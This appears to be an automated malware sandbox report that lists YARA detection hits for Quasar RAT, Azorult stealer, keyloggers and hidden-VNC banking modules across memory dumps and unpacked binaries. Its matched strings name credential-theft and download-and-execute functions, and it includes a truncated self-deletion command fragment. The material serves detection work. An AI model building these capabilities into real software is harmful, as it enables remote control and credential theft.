0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45c9e:$s1: DoUploadAndExecute 0x4b5b5:$s2: DoDownloadAndExecute 0x45a74:$s3: DoShellExecute 0x45e96:$s4: set_Processname 0x14230:$op1: 04 1E FE 02 04 16 FE 01 60 0x14154:$op2: 00 17 03 1F 20 17 19 15 28 0x14bc1:$op3: 00 04 03 69 91 1B 40 0x15420:$op3: 00 04 03 69 91 1B 40
00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45c9e:$s1: DoUploadAndExecute 0x4b5b5:$s2: DoDownloadAndExecute 0x45a74:$s3: DoShellExecute 0x45e96:$s4: set_Processname 0x14230:$op1: 04 1E FE 02 04 16 FE 01 60 0x14154:$op2: 00 17 03 1F 20 17 19 15 28 0x14bc1:$op3: 00 04 03 69 91 1B 40 0x15420:$op3: 00 04 03 69 91 1B 40
00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x4524e:$s1: DoUploadAndExecute 0x4ab65:$s2: DoDownloadAndExecute 0x45024:$s3: DoShellExecute 0x45446:$s4: set_Processname 0x137e0:$op1: 04 1E FE 02 04 16 FE 01 60 0x13704:$op2: 00 17 03 1F 20 17 19 15 28 0x14171:$op3: 00 04 03 69 91 1B 40 0x149d0:$op3: 00 04 03 69 91 1B 40
0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45c9e:$s1: DoUploadAndExecute 0x4b5b5:$s2: DoDownloadAndExecute 0x45a74:$s3: DoShellExecute 0x45e96:$s4: set_Processname 0x14230:$op1: 04 1E FE 02 04 16 FE 01 60 0x14154:$op2: 00 17 03 1F 20 17 19 15 28 0x14bc1:$op3: 00 04 03 69 91 1B 40 0x15420:$op3: 00 04 03 69 91 1B 40
00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x11a04a:$s1: DoUploadAndExecute 0x11f961:$s2: DoDownloadAndExecute 0x119e20:$s3: DoShellExecute 0x11a242:$s4: set_Processname 0xe85dc:$op1: 04 1E FE 02 04 16 FE 01 60 0xe8500:$op2: 00 17 03 1F 20 17 19 15 28 0xe8f6d:$op3: 00 04 03 69 91 1B 40 0xe97cc:$op3: 00 04 03 69 91 1B 40
00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000018.00000002.794854333.0000000000401000.00000020.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000018.00000002.794854333.0000000000401000.00000020.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45c9e:$s1: DoUploadAndExecute 0x4b5b5:$s2: DoDownloadAndExecute 0x45a74:$s3: DoShellExecute 0x45e96:$s4: set_Processname 0x14230:$op1: 04 1E FE 02 04 16 FE 01 60 0x14154:$op2: 00 17 03 1F 20 17 19 15 28 0x14bc1:$op3: 00 04 03 69 91 1B 40 0x15420:$op3: 00 04 03 69 91 1B 40
0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x11a04a:$s1: DoUploadAndExecute 0x11f961:$s2: DoDownloadAndExecute 0x119e20:$s3: DoShellExecute 0x11a242:$s4: set_Processname 0xe85dc:$op1: 04 1E FE 02 04 16 FE 01 60 0xe8500:$op2: 00 17 03 1F 20 17 19 15 28 0xe8f6d:$op3: 00 04 03 69 91 1B 40 0xe97cc:$op3: 00 04 03 69 91 1B 40
00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000016.00000002.938070643.0000000000260000.00000040.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000016.00000002.938070643.0000000000260000.00000040.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x11a04a:$s1: DoUploadAndExecute 0x11f961:$s2: DoDownloadAndExecute 0x119e20:$s3: DoShellExecute 0x11a242:$s4: set_Processname 0xe85dc:$op1: 04 1E FE 02 04 16 FE 01 60 0xe8500:$op2: 00 17 03 1F 20 17 19 15 28 0xe8f6d:$op3: 00 04 03 69 91 1B 40 0xe97cc:$op3: 00 04 03 69 91 1B 40
0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x11a04a:$s1: DoUploadAndExecute 0x11f961:$s2: DoDownloadAndExecute 0x119e20:$s3: DoShellExecute 0x11a242:$s4: set_Processname 0xe85dc:$op1: 04 1E FE 02 04 16 FE 01 60 0xe8500:$op2: 00 17 03 1F 20 17 19 15 28 0xe8f6d:$op3: 00 04 03 69 91 1B 40 0xe97cc:$op3: 00 04 03 69 91 1B 40
00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x44ea6:$s1: DoUploadAndExecute 0x4a7bd:$s2: DoDownloadAndExecute 0x44c7c:$s3: DoShellExecute 0x4509e:$s4: set_Processname 0x13438:$op1: 04 1E FE 02 04 16 FE 01 60 0x1335c:$op2: 00 17 03 1F 20 17 19 15 28 0x13dc9:$op3: 00 04 03 69 91 1B 40 0x14628:$op3: 00 04 03 69 91 1B 40
0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x44ea6:$s1: DoUploadAndExecute 0x4a7bd:$s2: DoDownloadAndExecute 0x44c7c:$s3: DoShellExecute 0x4509e:$s4: set_Processname 0x13438:$op1: 04 1E FE 02 04 16 FE 01 60 0x1335c:$op2: 00 17 03 1F 20 17 19 15 28 0x13dc9:$op3: 00 04 03 69 91 1B 40 0x14628:$op3: 00 04 03 69 91 1B 40
00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45c9e:$s1: DoUploadAndExecute 0x4b5b5:$s2: DoDownloadAndExecute 0x45a74:$s3: DoShellExecute 0x45e96:$s4: set_Processname 0x14230:$op1: 04 1E FE 02 04 16 FE 01 60 0x14154:$op2: 00 17 03 1F 20 17 19 15 28 0x14bc1:$op3: 00 04 03 69 91 1B 40 0x15420:$op3: 00 04 03 69 91 1B 40
0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x4524e:$s1: DoUploadAndExecute 0x4ab65:$s2: DoDownloadAndExecute 0x45024:$s3: DoShellExecute 0x45446:$s4: set_Processname 0x137e0:$op1: 04 1E FE 02 04 16 FE 01 60 0x13704:$op2: 00 17 03 1F 20 17 19 15 28 0x14171:$op3: 00 04 03 69 91 1B 40 0x149d0:$op3: 00 04 03 69 91 1B 40
0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x11a04a:$s1: DoUploadAndExecute 0x11f961:$s2: DoDownloadAndExecute 0x119e20:$s3: DoShellExecute 0x11a242:$s4: set_Processname 0xe85dc:$op1: 04 1E FE 02 04 16 FE 01 60 0xe8500:$op2: 00 17 03 1F 20 17 19 15 28 0xe8f6d:$op3: 00 04 03 69 91 1B 40 0xe97cc:$op3: 00 04 03 69 91 1B 40
00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45c9e:$s1: DoUploadAndExecute 0x4b5b5:$s2: DoDownloadAndExecute 0x45a74:$s3: DoShellExecute 0x45e96:$s4: set_Processname 0x14230:$op1: 04 1E FE 02 04 16 FE 01 60 0x14154:$op2: 00 17 03 1F 20 17 19 15 28 0x14bc1:$op3: 00 04 03 69 91 1B 40 0x15420:$op3: 00 04 03 69 91 1B 40
00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000016.00000002.938168634.0000000000297000.00000040.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000016.00000002.938168634.0000000000297000.00000040.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp	Azorult_1	Azorult Payload	kevoreilly	0x17f53:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12c7c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x11a04a:$s1: DoUploadAndExecute 0x11f961:$s2: DoDownloadAndExecute 0x119e20:$s3: DoShellExecute 0x11a242:$s4: set_Processname 0xe85dc:$op1: 04 1E FE 02 04 16 FE 01 60 0xe8500:$op2: 00 17 03 1F 20 17 19 15 28 0xe8f6d:$op3: 00 04 03 69 91 1B 40 0xe97cc:$op3: 00 04 03 69 91 1B 40
00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45c9e:$s1: DoUploadAndExecute 0x4b5b5:$s2: DoDownloadAndExecute 0x45a74:$s3: DoShellExecute 0x45e96:$s4: set_Processname 0x14230:$op1: 04 1E FE 02 04 16 FE 01 60 0x14154:$op2: 00 17 03 1F 20 17 19 15 28 0x14bc1:$op3: 00 04 03 69 91 1B 40 0x15420:$op3: 00 04 03 69 91 1B 40
0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x11a04a:$s1: DoUploadAndExecute 0x11f961:$s2: DoDownloadAndExecute 0x119e20:$s3: DoShellExecute 0x11a242:$s4: set_Processname 0xe85dc:$op1: 04 1E FE 02 04 16 FE 01 60 0xe8500:$op2: 00 17 03 1F 20 17 19 15 28 0xe8f6d:$op3: 00 04 03 69 91 1B 40 0xe97cc:$op3: 00 04 03 69 91 1B 40
00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x11a04a:$s1: DoUploadAndExecute 0x11f961:$s2: DoDownloadAndExecute 0x119e20:$s3: DoShellExecute 0x11a242:$s4: set_Processname 0xe85dc:$op1: 04 1E FE 02 04 16 FE 01 60 0xe8500:$op2: 00 17 03 1F 20 17 19 15 28 0xe8f6d:$op3: 00 04 03 69 91 1B 40 0xe97cc:$op3: 00 04 03 69 91 1B 40
0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
Process Memory Space: CVbJSUXraQ.exe PID: 7128	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
Process Memory Space: CVbJSUXraQ.exe PID: 7128	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: CVbJSUXraQ.exe PID: 7128	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
Process Memory Space: CVbJSUXraQ.exe PID: 7128	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CVbJSUXraQ.exe PID: 7128	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: CVbJSUXraQ.exe PID: 7128	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
Process Memory Space: vnc.exe PID: 6296	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
Process Memory Space: svchost.exe PID: 5200	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
Process Memory Space: windef.exe PID: 5848	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: CVbJSUXraQ.exe PID: 4112	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: CVbJSUXraQ.exe PID: 4112	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CVbJSUXraQ.exe PID: 4112	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: CVbJSUXraQ.exe PID: 4112	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
Process Memory Space: SystemPropertiesPerformance.exe PID: 6424	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
Process Memory Space: SystemPropertiesPerformance.exe PID: 6424	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Process Memory Space: SystemPropertiesPerformance.exe PID: 6424	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
Process Memory Space: SystemPropertiesPerformance.exe PID: 6424	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SystemPropertiesPerformance.exe PID: 6424	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: SystemPropertiesPerformance.exe PID: 6424	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
Click to see the 191 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.CVbJSUXraQ.exe.ee9fac.3.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.2.CVbJSUXraQ.exe.ee9fac.3.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.2.CVbJSUXraQ.exe.ee9fac.3.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.2.CVbJSUXraQ.exe.ee9fac.3.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
6.0.windef.exe.f10000.0.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x456f4:$x3: GetKeyloggerLogsResponse 0x45bea:$x4: GetKeyloggerLogs 0x45eb1:$s1: <RunHidden>k__BackingField 0x458bc:$s2: set_SystemInfos 0x45eda:$s3: set_RunHidden 0x45ae8:$s4: set_RemotePath 0x56bf8:$s6: Client.exe 0x56c60:$s6: Client.exe 0x4af5b:$s7: xClient.Core.ReverseProxy.Packets
6.0.windef.exe.f10000.0.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x30a28:$x4: xClient.Properties.Resources.resources 0x308e9:$s4: Client.exe 0x45eda:$s7: set_RunHidden
6.0.windef.exe.f10000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x45e9e:$s1: DoUploadAndExecute 0x4b7b5:$s2: DoDownloadAndExecute 0x45c74:$s3: DoShellExecute 0x46096:$s4: set_Processname 0x14430:$op1: 04 1E FE 02 04 16 FE 01 60 0x14354:$op2: 00 17 03 1F 20 17 19 15 28 0x14dc1:$op3: 00 04 03 69 91 1B 40 0x15620:$op3: 00 04 03 69 91 1B 40
6.0.windef.exe.f10000.0.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x456f4:$x1: GetKeyloggerLogsResponse 0x45934:$s1: DoShellExecuteResponse 0x3ed22:$s2: GetPasswordsResponse 0x45807:$s3: GetStartupItemsResponse 0x3bff0:$s4: <GetGenReader>b__7 0x45eb2:$s5: RunHidden 0x45ed0:$s5: RunHidden 0x45ede:$s5: RunHidden 0x45ef2:$s5: RunHidden
6.0.windef.exe.f10000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x4e7cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
6.0.windef.exe.f10000.0.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x4e590:$x2: Process already elevated. 0x470ef:$x4: get_encryptedPassword 0x4b7b5:$x5: DoDownloadAndExecute
6.0.windef.exe.f10000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
